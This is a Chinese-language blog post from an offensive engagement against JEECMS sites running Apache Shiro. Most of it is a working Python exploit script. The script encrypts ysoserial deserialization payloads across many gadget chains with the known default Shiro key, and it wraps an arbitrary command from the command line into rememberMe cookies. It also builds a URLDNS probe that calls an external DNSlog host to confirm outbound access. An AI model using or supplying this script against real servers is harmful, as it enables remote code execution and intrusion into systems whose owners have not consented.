前言: 在一次攻防中,再次遭遇到JEECMS,尽管拥有key,却无法通过常规链回显。本文介绍了使用DNSURL利用链实现出网的小技巧。
收集信息: 发现JEECMS的一个小技巧是通过install.html
查看jeecms的版本。
DNSURL利用链探测: 对于Shiro,使用成熟的exp工具自动回显利用的情况越来越少。由于DNSURL链是基于jar包且不受版本影响的,遇到shiro的出网站时,可以使用Urldns工具生成利用链探测payload,实际操作如下:
请注意,生成的是base64编码的值,shiro验证和利用需要编写脚本进行AES或GCM加密。使用Burp输入cookie字段发包后,可以得知服务器为Windows,存在c3p0-92版本和cc31版本依赖。
相关EXP脚本: 在验证过程中,可以搭配魔改版的yso(ysoserial-for-woodpecker),编写脚本批量生成payload,以便使用Burp发送请求进行测试。
# pip install pycrypto
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command,gadget):
popen = subprocess.Popen(['java', '-jar', '.\\ysoserial-for-woodpecker-0.5.1.jar', '-g', gadget , '-a', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "4AvVhmFLUs0KTA3Kprsdag=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def encode_rememberme1():
popen = subprocess.Popen(['java', '-jar', '.\\ysoserial-for-woodpecker-0.5.1.jar', '-g', 'URLDNS' , '-a', 'http://test5.351999e7.dns.1433.eu.org'], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "4AvVhmFLUs0KTA3Kprsdag=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
cmd = sys.argv[1]
gadgets = ['C3P0','C3P0_LowVer','CommonsBeanutils1','CommonsBeanutils1_183','CommonsBeanutils2','CommonsBeanutils2_183','CommonsBeanutils3',
'CommonsCollections1','CommonsCollections2','CommonsCollections3','CommonsCollections4','CommonsCollections5','CommonsCollections6','CommonsCollections7','CommonsCollections8',
'CommonsCollections9','CommonsCollections10','CommonsCollections11','CommonsCollections6Lite','CommonsCollectionsK1','CommonsCollectionsK2','CommonsCollectionsK3','CommonsCollectionsK4']
for gadget in gadgets:
payload=encode_rememberme(cmd,gadget)
with open("./payload.cookie", "a+") as fpw:
print("rememberMe={}".format(payload.decode()), file=fpw)
payload1=encode_rememberme1()
with open("./payload.cookie", "a+") as fpw:
print("rememberMe={}".format(payload1.decode()), file=fpw)
通过以上步骤,深入了解Shiro在JEECMS攻防中的特殊技巧和DNSURL利用链的应用。
© 版权声明
THE END
暂无评论内容